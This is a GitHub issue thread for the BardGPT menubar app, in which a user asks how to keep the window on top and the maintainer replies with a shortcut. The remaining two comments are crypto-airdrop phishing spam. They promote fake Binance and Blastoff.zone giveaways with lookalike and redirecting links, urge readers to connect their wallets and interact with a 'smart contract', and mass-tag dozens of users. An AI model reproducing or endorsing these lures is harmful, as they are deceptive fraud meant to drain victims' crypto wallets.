### ISSUE TITLE
Stand-alone Window Without Disappearing After Click on Something Else

### ISSUE THREAD

**Issue by kolinkorr839** [shadowfax92/BardGPT#1]
When I start using it, then let say I click on something else (eg. browser). The window disappears and I have to re-click the menubar icon for it to appear. Is there a way to have an option for it to just stay in front until I closed it?

**Comment by shadowfax92** [comment]
Yes, right now it's not configured to stay on top of other windows. You could use Cmd+Shift+G to quickly bring it back up :)

PS: For future, will look at adding settings to support always stay on top.

**Comment by rajiur007** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @m-goppelt, @1010adigupta, @TRkizaki, @ogenev, @benqian, @jasonzhouu, @k-nrd

**Comment by phieule2024** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
amaugarci, @Aniket21mathur, @luiscm88, @akremstudy, @AppServiceProvider, @vikrant1708, @koladev32, @eigengravy, @cawfree, @baumstern, @danscan, @ImaginaryStargazer, @bananlabs, @LuaxY, @peebeejay, @colejhudson, @githubsands, @thor314, @appleseed-iii, @WhiteR4bbitt, @kaichen, @systemis, @refl3ction, @psytron, @wormtql, @xinbenlv, @sanjayheaven, @victortv7, @luoq, @mwilc0x, @evilrobot-01, @proudmuslim-dev, @novawish, @Kadirsol, @rde9, @tuxcanfly, @hujw77, @0xKoda, @yasimba, @dummy-account007, @coopbri, @qartel40, @bnclt, @SebastianElvis, @havafy, @pandadefi, @darknight, @thiagopnts, @0xdewy, @gapurov
